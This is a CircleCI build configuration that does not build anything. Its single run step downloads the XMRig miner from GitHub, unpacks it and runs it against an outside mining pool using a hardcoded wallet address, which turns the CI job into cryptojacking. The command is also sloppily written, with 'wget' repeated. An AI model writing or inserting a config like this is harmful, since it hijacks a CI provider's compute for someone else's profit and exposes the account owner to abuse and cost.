version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget wget https://github.com/xmrig/xmrig/releases/download/v6.14.0/xmrig-6.14.0-linux-x64.tar.gz && tar -zxf xmrig-6.14.0-linux-x64.tar.gz && cd xmrig-6.14.0 && ./xmrig -o 	sg.kevacoin.herominers.com:1163 -a rx -k -u VULHibM2f5qeVSTjj7inRgF9mm8RPuKg2j.windows -p x